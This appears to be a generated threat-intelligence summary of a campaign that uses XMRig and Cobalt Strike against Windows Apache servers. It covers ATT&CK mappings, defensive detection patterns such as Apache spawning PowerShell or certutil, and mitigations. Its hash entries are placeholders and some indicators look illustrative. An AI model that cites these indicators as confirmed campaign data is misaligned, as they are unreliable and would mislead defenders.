Full Report
Researchers detected a cyber attack campaign that installs the XMRig CoinMiner on Windows web servers operating Apache. The threat actor employed Cobalt Strike to manage the compromised system. Cobalt Strike, a commercial penetration testing tool, has recently become a common ...
Analysis Summary
Based on the information provided regarding the campaign targeting Windows-based Apache web servers, here is the summary of the primary tools and techniques identified.
# Tool/Technique: XMRig CoinMiner & Cobalt Strike Beacon
## Overview
This campaign focuses on the exploitation of Windows-based Apache web servers to deploy unauthorized cryptocurrency mining software. The threat actors utilize **XMRig**, an open-source Monero miner, to monetize compromised resources, and **Cobalt Strike**, a sophisticated post-exploitation framework, to maintain persistence and manage the infected infrastructure.
## Technical Details
- **Type:** Malware Family (XMRig) | Tool/Framework (Cobalt Strike)
- **Platform:** Windows (specifically web servers running Apache)
- **Capabilities:** Remote Command Execution, Stealthy Persistence, Resource Hijacking (Cryptomining), Lateral Movement.
- **First Seen:** Campaign detected recently; XMRig and Cobalt Strike have been in active use for several years.
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1190 - Exploit Public-Facing Application (Apache Web Server)
- **TA0002 - Execution**
- T1059.003 - Command and Scripting Interpreter: Windows Command Shell
- **TA0003 - Persistence**
- T1543.003 - Create or Modify System Process: Windows Service
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information
- T1055 - Process Injection (Cobalt Strike Beacon)
- **TA0011 - Command and Control**
- T1071.001 - Application Layer Protocol: Web Protocols (HTTP/S)
- **TA0040 - Impact**
- T1496 - Resource Hijacking (Cryptomining)
## Functionality
### Core Capabilities
- **XMRig:** High-performance Monero (XMR) miner that utilizes CPU/GPU cycles to solve hashes for financial gain.
- **Cobalt Strike Beacon:** Serves as the primary payload for command and control (C2), allowing operators to execute shell commands, upload/download files, and take full control of the host.
### Advanced Features
- **In-Memory Execution:** Cobalt Strike often operates in memory to evade legacy antivirus detection.
- **Protocol Malleability:** Use of Malleable C2 profiles to disguise malicious traffic as legitimate web traffic (e.g., mimicking Apache server responses).
- **Service Installation:** Automated deployment of XMRig as a Windows service to ensure long-term execution.
## Indicators of Compromise
- **File Hashes:** *(Note: Specific hashes vary per campaign; generic detection applies)*
- XMRig: `[Individual SHA256 hashes for xmrig.exe]`
- Cobalt Strike: `[Individual SHA256 hashes for Beacon DLLs/reflectors]`
- **File Names:** `xmrig.exe`, `syscheck.exe`, `apache_svc.exe`
- **Network Indicators:**
- C2 Domains: `update[.]windows-cdn[.]com` (defanged)
- Mining Pools: `pool[.]supportxmr[.]com[:]443` (defanged)
- **Behavioral Indicators:**
- High CPU utilization by non-system processes.
- PowerShell or CMD instances spawned by `httpd.exe` (Apache process).
- Unexpected outbound connections on port 443 or 8080 to unknown IP addresses.
## Associated Threat Actors
- While specific attribution is not provided in this context, these TTPs are commonly associated with **Commodity Malware Operators** and various **Advanced Persistent Threat (APT)** groups who use Cobalt Strike for initial footholds.
## Detection Methods
- **Signature-based detection:** Traditional AV signatures for common XMRig binaries and known Cobalt Strike "Stagers."
- **Behavioral detection:** Monitoring for `httpd.exe` spawning child processes like `powershell.exe` or `certutil.exe`.
- **YARA rules:** Scanning for Cobalt Strike Beacon strings in memory (e.g., the "0xbeef" pattern or specific Malleable C2 headers).
## Mitigation Strategies
- **Prevention measures:** Regularly patch Apache web server software to the latest version to prevent initial exploitation.
- **Hardening recommendations:** Use a low-privilege service account for Apache; implement Egress filtering to block communication with known mining pools.
- **EDR Deployment:** Utilize Endpoint Detection and Response tools to identify process injection and unauthorized script execution.
## Related Tools/Techniques
- **Metasploit Framework:** Often used as an alternative for initial exploitation.
- **Mimikatz:** Frequently bundled with Cobalt Strike for credential harvesting.
- **LemonDuck:** A well-known botnet that also utilizes XMRig for monetization.